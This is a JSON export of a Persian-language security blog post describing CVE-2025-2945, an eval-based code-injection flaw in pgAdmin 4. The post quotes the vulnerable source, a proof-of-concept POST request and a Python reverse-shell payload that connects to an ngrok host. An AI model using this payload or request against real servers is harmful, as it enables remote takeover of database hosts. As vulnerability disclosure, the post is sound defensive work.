{"id":62531,"date":"2025-04-08T12:28:27","date_gmt":"2025-04-08T08:58:27","guid":{"rendered":"https:\/\/afaghhosting.net\/blog\/?p=62531"},"modified":"2025-04-08T12:28:27","modified_gmt":"2025-04-08T08:58:27","slug":"%d8%a2%d8%b3%db%8c%d8%a8-%d9%be%d8%b0%db%8c%d8%b1%db%8c-%d8%a8%d8%ad%d8%b1%d8%a7%d9%86%db%8c-rce-%d8%af%d8%b1-pgadmin4","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/%d8%a2%d8%b3%db%8c%d8%a8-%d9%be%d8%b0%db%8c%d8%b1%db%8c-%d8%a8%d8%ad%d8%b1%d8%a7%d9%86%db%8c-rce-%d8%af%d8%b1-pgadmin4\/","title":{"rendered":"\u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0628\u062d\u0631\u0627\u0646\u06cc RCE \u062f\u0631 pgAdmin4"},"content":{"rendered":"

\u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0628\u0627 \u0634\u0646\u0627\u0633\u0647 \u06cc CVE-2025-2945 \u062f\u0631 pgAdmin 4 \u06af\u0632\u0627\u0631\u0634 \u0648 \u0627\u0635\u0644\u0627\u062d \u0634\u062f\u0647 \u06a9\u0647 \u0627\u0645\u06a9\u0627\u0646 \u0627\u062c\u0631\u0627\u06cc \u06a9\u062f \u062f\u0644\u062e\u0648\u0627\u0647 \u0631\u0648 \u0628\u0647 \u0645\u0647\u0627\u062c\u0645 \u0645\u06cc\u062f\u0647.<\/p>\n

pgAdmin \u06cc\u06a9 \u0627\u0628\u0632\u0627\u0631 \u0645\u062a\u0646\u200c\u0628\u0627\u0632 \u0628\u0631\u0627\u06cc \u0645\u062f\u06cc\u0631\u06cc\u062a \u062f\u06cc\u062a\u0627\u0628\u06cc\u0633 PostgreSQL \u0647\u0633\u062a\u0634 \u06a9\u0647 \u0628\u0647 \u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u0627\u062c\u0627\u0632\u0647 \u0645\u06cc\u062f\u0647 \u062a\u0627 \u062c\u062f\u0627\u0648\u0644\u060c \u06a9\u0648\u0626\u0631\u06cc\u0647\u0627 \u0648 \u062a\u0646\u0638\u06cc\u0645\u0627\u062a \u062f\u06cc\u062a\u0627\u0628\u06cc\u0633 \u0631\u0648 \u0627\u0632 \u0637\u0631\u06cc\u0642 \u06cc\u06a9 \u0631\u0627\u0628\u0637 \u06a9\u0627\u0631\u0628\u0631\u06cc \u06af\u0631\u0627\u0641\u06cc\u06a9\u06cc \u0645\u062f\u06cc\u0631\u06cc\u062a \u06a9\u0646\u0646. \u0646\u0633\u062e\u0647\u200c \u0647\u0627\u06cc \u0627\u0648\u0644\u06cc\u0647 pgAdmin \u0628\u0635\u0648\u0631\u062a \u0628\u0631\u0646\u0627\u0645\u0647 \u062f\u0633\u06a9\u062a\u0627\u067e\u06cc \u0628\u0648\u062f\u0646 \u0648 \u0628\u0627 \u0632\u0628\u0627\u0646\u0647\u0627\u06cc\u06cc \u0645\u062b\u0644 ++C \u0646\u0648\u0634\u062a\u0647 \u0634\u062f\u0647 \u0628\u0648\u062f\u0646.<\/p>\n

pgAdmin 4 \u0646\u0633\u0644 \u062c\u062f\u06cc\u062f \u0627\u06cc\u0646 \u0627\u0628\u0632\u0627\u0631 \u0627\u0633\u062a \u06a9\u0647 \u0627\u0632 \u0646\u0633\u062e\u0647\u200c\u0647\u0627\u06cc \u0642\u0628\u0644\u06cc \u06a9\u0627\u0645\u0644\u0627\u064b \u0645\u062a\u0645\u0627\u06cc\u0632\u0647. \u0628\u0631\u062e\u0644\u0627\u0641 \u0646\u0633\u062e\u0647\u200c\u0647\u0627\u06cc \u0642\u0628\u0644\u06cc\u060c pgAdmin 4 \u0628\u0635\u0648\u0631\u062a \u06cc\u06a9 \u0628\u0631\u0646\u0627\u0645\u0647 \u062a\u062d\u062a \u0648\u0628 \u0637\u0631\u0627\u062d\u06cc \u0634\u062f\u0647. \u0627\u06cc\u0646 \u06cc\u0639\u0646\u06cc \u0628\u0627 \u06cc\u06a9 \u0633\u0631\u0648\u0631 \u0645\u062d\u0644\u06cc \u06cc\u0627 \u0631\u0627\u0647 \u062f\u0648\u0631 \u0627\u062c\u0631\u0627 \u0645\u06cc\u0634\u0647 \u0648 \u0627\u0632 \u0637\u0631\u06cc\u0642 \u0645\u0631\u0648\u0631\u06af\u0631 \u0648\u0628 \u0642\u0627\u0628\u0644 \u062f\u0633\u062a\u0631\u0633 \u0647\u0633\u062a\u0634.<\/p>\n

pgAdmin 4 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u067e\u0627\u06cc\u062a\u0648\u0646 (\u0628\u0631\u0627\u06cc \u0628\u06a9\u200c\u0627\u0646\u062f) \u0648 \u062c\u0627\u0648\u0627\u0627\u0633\u06a9\u0631\u06cc\u067e\u062a (\u0628\u0631\u0627\u06cc \u0641\u0631\u0627\u0646\u062a\u200c\u0627\u0646\u062f) \u0646\u0648\u0634\u062a\u0647 \u0634\u062f\u0647 \u0648 \u0645\u06cc\u0634\u0647 \u0627\u0648\u0646\u0648 \u0628\u0635\u0648\u0631\u062a \u0645\u0633\u062a\u0642\u0644 \u0631\u0648\u06cc \u062f\u0633\u06a9\u062a\u0627\u067e \u06cc\u0627 \u0628\u0635\u0648\u0631\u062a \u0633\u0631\u0648\u0631 \u062f\u0631 \u0634\u0628\u06a9\u0647 \u0646\u0635\u0628 \u06a9\u0631\u062f.<\/p>\n

\u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc CVE-2025-2945 \u0627\u0632 \u0646\u0648\u0639 Code Injection \u0647\u0633\u062a\u0634 \u0648 \u0627\u0645\u062a\u06cc\u0627\u0632 10 \u0648 \u0634\u062f\u062a \u0628\u062d\u0631\u0627\u0646\u06cc \u062f\u0627\u0631\u0647. \u0628\u0631\u0627\u06cc \u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a\u060c \u06cc\u06a9 \u06a9\u0627\u0631\u0628\u0631 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a\u200c \u0634\u062f\u0647 \u0628\u0627\u06cc\u062f \u0628\u062a\u0648\u0646\u0647 \u06cc\u06a9 \u062f\u0631\u062e\u0648\u0627\u0633\u062a POST \u0628\u0647 \u0633\u0631\u0648\u0631 pgAdmin \u0627\u0631\u0633\u0627\u0644 \u06a9\u0646\u0647.<\/p>\n

\u0646\u0633\u062e\u0647 \u0627\u0635\u0644\u0627\u062d \u0634\u062f\u0647 9.2 \u0647\u0633\u062a\u0634 \u0648 \u0646\u0633\u062e\u0647 \u0647\u0627\u06cc \u0642\u0628\u0644 \u0627\u0632 \u0627\u06cc\u0646 \u0646\u0633\u062e\u0647\u060c \u062a\u062d\u062a \u062a\u0627\u062b\u06cc\u0631 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0633\u062a\u0646.<\/p>\n

\u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0631\u0648\u06cc \u0646\u0642\u0627\u0637 \u067e\u0627\u06cc\u0627\u0646\u06cc \u0632\u06cc\u0631 \u0647\u0633\u062a\u0634:<\/p>\n

\/sqleditor\/query_tool\/download<\/int:trans_id>\r\n\/cloud\/deploy<\/pre>\n
\u0639\u0644\u062a \u0627\u0635\u0644\u06cc \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0627\u06cc\u0646\u0647 \u06a9\u0647 \u0648\u0631\u0648\u062f\u06cc \u0647\u0627 \u0628\u0647 \u062f\u0631\u0633\u062a\u06cc \u067e\u0627\u06a9\u0633\u0627\u0632\u06cc \u06cc\u0627 \u0627\u0639\u062a\u0628\u0627\u0631\u0633\u0646\u062c\u06cc \u0646\u0645\u06cc\u0634\u0646 \u0648 \u0628\u0647 \u062a\u0627\u0628\u0639 eval<\/code> \u0627\u0631\u0633\u0627\u0644 \u0645\u06cc\u0634\u0646. \u062a\u0627\u0628\u0639 eval<\/code> \u06cc\u06a9 \u062a\u0627\u0628\u0639 \u062f\u0631 \u067e\u0627\u06cc\u062a\u0648\u0646 \u0647\u0633\u062a\u0634 \u06a9\u0647 \u06cc\u06a9 \u0648\u0631\u0648\u062f\u06cc \u0631\u0648 \u062f\u0631 \u0642\u0627\u0644\u0628 \u0631\u0634\u062a\u0647 \u0645\u06cc\u06af\u06cc\u0631\u0647 \u0648 \u0627\u0648\u0646\u0648 \u0627\u062c\u0631\u0627 \u0645\u06cc\u06a9\u0646\u0647.<\/p>\n
\u06a9\u062f \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 \u0646\u0642\u0637\u0647 \u067e\u0627\u06cc\u0627\u0646\u06cc \/sqleditor\/query_tool\/download\/<int:trans_id> \u0628\u0635\u0648\u0631\u062a \u0632\u06cc\u0631 \u0647\u0633\u062a\u0634:<\/p>\n
# https:\/\/github.com\/pgadmin-org\/pgadmin4\/blob\/REL-9_1\/web\/pgadmin\/tools\/sqleditor\/__init__.py#L2124-L2160\r\n\r\n@blueprint.route(\r\n    '\/query_tool\/download\/<int:trans_id>',\r\n    methods=[\"POST\"],\r\n    endpoint='query_tool_download'\r\n)\r\n@pga_login_required\r\ndef start_query_download_tool(trans_id):\r\n    (status, error_msg, sync_conn, trans_obj,\r\n     session_obj) = check_transaction_status(trans_id)\r\n\r\n    if not status or sync_conn is None or trans_obj is None or \r\n            session_obj is None:\r\n        return internal_server_error(\r\n            errormsg=TRANSACTION_STATUS_CHECK_FAILED\r\n        )\r\n\r\n    data = request.values if request.values else request.get_json(silent=True)\r\n    if data is None:\r\n        return make_json_response(\r\n            status=410,\r\n            success=0,\r\n            errormsg=gettext(\r\n                \"Could not find the required parameter (query).\"\r\n            )\r\n        )\r\n\r\n    try:\r\n        sql = None\r\n        query_commited = data.get('query_commited', False)\r\n        # Iterate through CombinedMultiDict to find query.\r\n        for key, value in data.items():\r\n            if key == 'query':\r\n                sql = value\r\n            if key == 'query_commited':\r\n                query_commited = (\r\n                    eval(value) if isinstance(value, str) else value # vuln code\r\n                )<\/pre>\n
\u0647\u0645\u0648\u0646\u0637\u0648\u0631 \u06a9\u0647 \u062f\u0631 \u06a9\u062f \u0642\u0627\u0628\u0644 \u0645\u0634\u0627\u0647\u062f\u0647 \u0647\u0633\u062a\u0634\u060c \u067e\u0627\u0631\u0627\u0645\u062a\u0631 query_committed<\/code> \u06a9\u0647 \u0627\u0632 \u0646\u0648\u0639 \u0631\u0634\u062a\u0647 \u0647\u0633\u062a\u0634\u060c \u0628\u0635\u0648\u0631\u062a \u0645\u0633\u062a\u0642\u06cc\u0645 \u062f\u0631 \u062a\u0627\u0628\u0639 eval \u0642\u0631\u0627\u0631 \u0645\u06cc\u06af\u06cc\u0631\u0647. \u0628\u0646\u0627\u0628\u0631\u0627\u06cc\u0646 \u0627\u06af\u0647 \u0645\u0647\u0627\u062c\u0645 \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u0632\u06cc\u0631 \u0631\u0648 \u0627\u0631\u0633\u0627\u0644 \u06a9\u0646\u0647\u060c \u0645\u06cc\u062a\u0648\u0646\u0647 \u06a9\u062f \u062f\u0644\u062e\u0648\u0627\u0647 \u0631\u0648 \u0631\u0648\u06cc \u0633\u0631\u0648\u0631 \u0627\u062c\u0631\u0627 \u06a9\u0646\u0647:<\/p>\n
POST \/sqleditor\/query_tool\/download\/9907078 HTTP\/1.1\r\nHost: localhost:8088\r\nContent-Type: application\/json\r\n\r\n{\r\n    \"query\": \"SELECT 1;\",\r\n    \"query_commited\": \"open('\/tmp\/pyozzi-poc', 'w')\"\r\n}<\/pre>\n
\"\u0622\u0633\u06cc\u0628<\/p>\n
\u0647\u0645\u0648\u0646\u0637\u0648\u0631 \u06a9\u0647 \u0645\u0634\u0627\u0647\u062f\u0647 \u0645\u06cc\u06a9\u0646\u06cc\u062f\u060c \u0645\u0647\u0627\u062c\u0645 \u0645\u06cc\u062a\u0648\u0646\u0647 \u06a9\u062f \u062f\u0644\u062e\u0648\u0627\u0647 \u067e\u0627\u06cc\u062a\u0648\u0646\u06cc \u0631\u0648 \u0628\u0627 \u062f\u0631\u062e\u0648\u0627\u0633\u062a POST \u0627\u062c\u0631\u0627 \u06a9\u0646\u0647.<\/p>\n
<\/div>\n
\u06a9\u062f \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 \u0646\u0642\u0637\u0647 \u067e\u0627\u06cc\u0627\u0646\u06cc \/cloud\/deploy \u0631\u0648 \u062f\u0631 \u0632\u06cc\u0631 \u0645\u0634\u0627\u0647\u062f\u0647 \u0645\u06cc\u06a9\u0646\u06cc\u062f:<\/p>\n
# https:\/\/github.com\/pgadmin-org\/pgadmin4\/blob\/REL-9_1\/web\/pgacloud\/providers\/google.py#L140\r\n\r\ndef _create_google_postgresql_instance(self, args):\r\n        credentials = self._get_credentials(self._scopes)\r\n        service = discovery.build('sqladmin', 'v1beta4',\r\n                                  credentials=credentials)\r\n        high_availability = \r\n            'REGIONAL' if eval(args.high_availability) else 'ZONAL' # vuln code\r\n\r\n        db_password = self._database_password \r\n            if self._database_password is not None else args.db_password\r\n\r\n        ip = args.public_ip if args.public_ip else '{}\/32'.format(get_my_ip())\r\n        authorized_networks = self.get_authorized_network_list(ip)\r\n\r\n        database_instance_body = {\r\n            'databaseVersion': args.db_version,\r\n            'instanceType': 'CLOUD_SQL_INSTANCE',\r\n            'project': args.project,\r\n            'name': args.name,\r\n            'region': args.region,\r\n            'gceZone': args.availability_zone,\r\n            'secondaryGceZone': args.secondary_availability_zone,\r\n            \"rootPassword\": db_password,\r\n            'settings': {\r\n                'tier': args.instance_type,\r\n                'availabilityType': high_availability,\r\n                'dataDiskType': args.storage_type,\r\n                'dataDiskSizeGb': args.storage_size,\r\n                'ipConfiguration': {\r\n                    \"authorizedNetworks\": authorized_networks,\r\n                    'ipv4Enabled': True\r\n                },\r\n            }\r\n        }<\/pre>\n
\u062f\u0631 \u0627\u06cc\u0646 \u0646\u0642\u0637\u0647 \u067e\u0627\u06cc\u0627\u0646\u06cc \u0647\u0645 \u067e\u0627\u0631\u0627\u0645\u062a\u0631 high_availability<\/code> \u0628\u0647 \u062a\u0627\u0628\u0639 eval \u0627\u0631\u0633\u0627\u0644 \u0645\u06cc\u0634\u0647. \u0645\u0647\u0627\u062c\u0645 \u0645\u06cc\u062a\u0648\u0646\u0647 \u0628\u0627 \u0627\u0631\u0633\u0627\u0644 \u06a9\u062f \u0632\u06cc\u0631\u060c \u06cc\u06a9 Reverse Shell \u0628\u06af\u06cc\u0631\u0647:<\/p>\n
exec('import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"0.tcp.jp.ngrok.io\",17477));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"\/bin\/sh\",\"-i\"])')<\/pre>\n
\u0627\u06cc\u0646 Reverse Shell \u0628\u0627 \u0627\u0645\u062a\u06cc\u0627\u0632 \u067e\u0631\u0648\u0633\u0633 pgAdmin \u0627\u062c\u0631\u0627 \u0645\u06cc\u0634\u0647. (\u0645\u0634\u0627\u0647\u062f\u0647 \u062f\u0645\u0648 \u062f\u0631 \u06cc\u0648\u062a\u06cc\u0648\u0628)<\/p>\n
<\/div>\n
\u0628\u0627 \u062a\u0648\u062c\u0647 \u0628\u0647 \u0648\u06cc\u0698\u06af\u06cc \u0647\u0627\u06cc \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc\u060c \u0645\u0647\u0627\u062c\u0645 \u0645\u06cc\u062a\u0648\u0646\u0647 \u06a9\u0627\u0631\u0647\u0627\u06cc \u0632\u06cc\u0631 \u0627\u0646\u062c\u0627\u0645 \u0628\u062f\u0647:<\/p>\n
    \n
  • \u062f\u0633\u062a\u0631\u0633\u06cc \u0648 \u062f\u0633\u062a\u06a9\u0627\u0631\u06cc \u062f\u0627\u062f\u0647 \u0647\u0627\u06cc \u062f\u06cc\u062a\u0627\u0628\u06cc\u0633<\/li>\n
  • \u062d\u0631\u06a9\u062a \u062c\u0627\u0646\u0628\u06cc: \u0645\u0647\u0627\u062c\u0645 \u0628\u0627 \u062f\u0633\u062a\u0631\u0633\u06cc \u0628\u0647 \u0633\u0631\u0648\u0631\u060c \u0645\u06cc\u062a\u0648\u0646\u0647 \u0634\u0628\u06a9\u0647 \u062f\u0627\u062e\u0644\u06cc \u0631\u0648 \u0628\u0631\u0627\u06cc \u06cc\u0627\u0641\u062a\u0646 \u0648 \u0647\u06a9 \u0633\u0627\u06cc\u0631 \u0633\u06cc\u0633\u062a\u0645 \u0647\u0627 \u0627\u0633\u06a9\u0646 \u06a9\u0646\u0647.<\/li>\n
  • \u0645\u0647\u0627\u062c\u0645 \u0645\u06cc\u062a\u0648\u0646\u0647 \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u062d\u0633\u0627\u0633 \u0645\u0627\u0646\u0646\u062f \u0627\u0639\u062a\u0628\u0627\u0631\u0646\u0627\u0645\u0647 \u0647\u0627\u060c \u0641\u0627\u06cc\u0644\u0647\u0627\u06cc \u06a9\u0627\u0646\u0641\u06cc\u06af\u060c API \u0648 \u2026 \u0631\u0648 \u0627\u0633\u062a\u062e\u0631\u0627\u062c \u06a9\u0646\u0647.<\/li>\n
  • \u0627\u06af\u0647 \u067e\u0631\u0648\u0633\u0633 pgAdmin \u0628\u0627 \u0627\u0645\u062a\u06cc\u0627\u0632 \u0628\u0627\u0644\u0627 \u0627\u062c\u0631\u0627 \u0628\u0634\u0647\u060c \u0645\u0647\u0627\u062c\u0645 \u0645\u06cc\u062a\u0648\u0646\u0647 \u0628\u0627 \u0633\u0627\u06cc\u0631 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627\u060c \u0627\u0645\u062a\u06cc\u0627\u0632 \u062e\u0648\u062f\u0634 \u0631\u0648 \u0628\u0647 ROOT \u0627\u0641\u0632\u0627\u06cc\u0634 \u0628\u062f\u0647.<\/li>\n
  • \u067e\u0631\u0633\u06cc\u0633\u062a (Persistence): \u0645\u0647\u0627\u062c\u0645 \u0645\u06cc\u062a\u0648\u0646\u0647 \u0628\u06a9\u062f\u0648\u0631 \u0646\u0635\u0628 \u06a9\u0646\u0647\u060c scheduled task \u0627\u06cc\u062c\u0627\u062f \u06a9\u0646\u0647 \u06cc\u0627 \u0627\u0633\u06a9\u0631\u06cc\u067e\u062a\u0647\u0627\u06cc startup \u0631\u0648 \u0628\u0631\u0627\u06cc \u062f\u0633\u062a\u0631\u0633\u06cc \u0637\u0648\u0644\u0627\u0646\u06cc \u0645\u062f\u062a \u062f\u0633\u062a\u06a9\u0627\u0631\u06cc \u06a9\u0646\u0647.<\/li>\n<\/ul>\n
    \u0646\u06a9\u062a\u0647 \u06cc \u062c\u0627\u0644\u0628 \u0627\u06cc\u0646\u0647 \u06a9\u0647\u060c py0zz1 \u06a9\u0647 \u0627\u06cc\u0646 \u0628\u0627\u06af \u0631\u0648 \u06af\u0632\u0627\u0631\u0634 \u062f\u0627\u062f\u0647\u060c \u06af\u0641\u062a\u0647 \u06a9\u0647 \u0648\u0642\u062a\u06cc \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0631\u0648 \u067e\u06cc\u062f\u0627 \u06a9\u0631\u062f\u0647\u060c \u0645\u062a\u0648\u062c\u0647 \u0646\u0634\u062f\u0647 \u06a9\u0647 \u0686\u0631\u0627 \u062f\u0631 \u0627\u06cc\u0646 \u06a9\u062f \u0627\u0632 \u062a\u0627\u0628\u0639 eval \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0634\u062f\u0647 \u0686\u0648\u0646 \u0628\u062f\u0648\u0646 \u0627\u0648\u0646 \u0647\u0645 \u0645\u06cc\u0634\u062f \u0645\u0646\u0637\u0642 \u06a9\u062f \u0631\u0648 \u067e\u06cc\u0627\u062f\u0647 \u0633\u0627\u0632\u06cc \u06a9\u0631\u062f.<\/p>\n
    \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc 16 \u0645\u0627\u0631\u0633 \u06af\u0632\u0627\u0631\u0634 \u0634\u062f\u0647 \u0648 \u062f\u0631 3 \u0622\u0648\u0631\u06cc\u0644 \u0646\u0633\u062e\u0647 \u06cc \u0627\u0635\u0644\u0627\u062d \u0634\u062f\u0647\u060c \u062f\u0631 \u0627\u062e\u062a\u06cc\u0627\u0631 \u0639\u0645\u0648\u0645 \u0642\u0631\u0627\u0631 \u06af\u0631\u0641\u062a\u0647.<\/p>\n
    \u0627\u06af\u0647 \u062f\u0631 \u0645\u0648\u062a\u0648\u0631 \u062c\u0633\u062a\u062c\u0648\u06cc FOFA \u062f\u0646\u0628\u0627\u0644 pgAdmin 4 \u0628\u0627\u0634\u06cc\u0645\u060c \u062d\u062f\u0648\u062f 42 \u0647\u0632\u0627\u0631 \u0645\u0648\u0631\u062f \u0631\u0648 \u0645\u06cc\u0627\u0631\u0647 \u06a9\u0647 \u0633\u0647\u0645 \u0627\u06cc\u0631\u0627\u0646 449 \u0645\u0648\u0631\u062f \u0647\u0633\u062a\u0634. (\u0627\u0644\u0628\u062a\u0647 \u062f\u0627\u062f\u0647 \u0647\u0627 \u062e\u0627\u0645 \u0647\u0633\u062a\u0646 \u0648 \u0646\u0633\u062e\u0647 \u0631\u0648 \u062f\u0631 \u0646\u0638\u0631 \u0646\u06af\u0631\u0641\u062a\u06cc\u0645.) (\u0644\u06cc\u0633\u062a \u0645\u0648\u062a\u0648\u0631\u0647\u0627\u06cc \u062c\u0633\u062a\u062c\u0648 \u0645\u062e\u062a\u0635 \u0627\u0645\u0646\u06cc\u062a \u0633\u0627\u06cc\u0628\u0631\u06cc)<\/p>\n
    \"\u0646\u062a\u0627\u06cc\u062c<\/p>\n","protected":false},"excerpt":{"rendered":"
    \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0628\u0627 \u0634\u0646\u0627\u0633\u0647 \u06cc CVE-2025-2945 \u062f\u0631 pgAdmin 4 \u06af\u0632\u0627\u0631\u0634 \u0648 \u0627\u0635\u0644\u0627\u062d \u0634\u062f\u0647 \u06a9\u0647 \u0627\u0645\u06a9\u0627\u0646 \u0627\u062c\u0631\u0627\u06cc \u06a9\u062f \u062f\u0644\u062e\u0648\u0627\u0647 \u0631\u0648 \u0628\u0647 \u0645\u0647\u0627\u062c\u0645 \u0645\u06cc\u062f\u0647. pgAdmin \u06cc\u06a9 \u0627\u0628\u0632\u0627\u0631 \u0645\u062a\u0646\u200c\u0628\u0627\u0632 \u0628\u0631\u0627\u06cc \u0645\u062f\u06cc\u0631\u06cc\u062a \u062f\u06cc\u062a\u0627\u0628\u06cc\u0633 PostgreSQL \u0647\u0633\u062a\u0634 \u06a9\u0647 \u0628\u0647 \u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u0627\u062c\u0627\u0632\u0647 \u0645\u06cc\u062f\u0647 \u062a\u0627 \u062c\u062f\u0627\u0648\u0644\u060c \u06a9\u0648\u0626\u0631\u06cc\u0647\u0627 \u0648 \u062a\u0646\u0638\u06cc\u0645\u0627\u062a \u062f\u06cc\u062a\u0627\u0628\u06cc\u0633 \u0631\u0648 \u0627\u0632 \u0637\u0631\u06cc\u0642 \u06cc\u06a9 \u0631\u0627\u0628\u0637 \u06a9\u0627\u0631\u0628\u0631\u06cc \u06af\u0631\u0627\u0641\u06cc\u06a9\u06cc \u0645\u062f\u06cc\u0631\u06cc\u062a \u06a9\u0646\u0646. \u0646\u0633\u062e\u0647\u200c \u0647\u0627\u06cc \u0627\u0648\u0644\u06cc\u0647 pgAdmin …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26,29],"tags":[],"class_list":["post-62531","post","type-post","status-publish","format-standard","hentry","category-vulnerability","category-29"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/62531","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=62531"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/62531\/revisions"}],"predecessor-version":[{"id":62565,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/62531\/revisions\/62565"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=62531"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=62531"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=62531"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}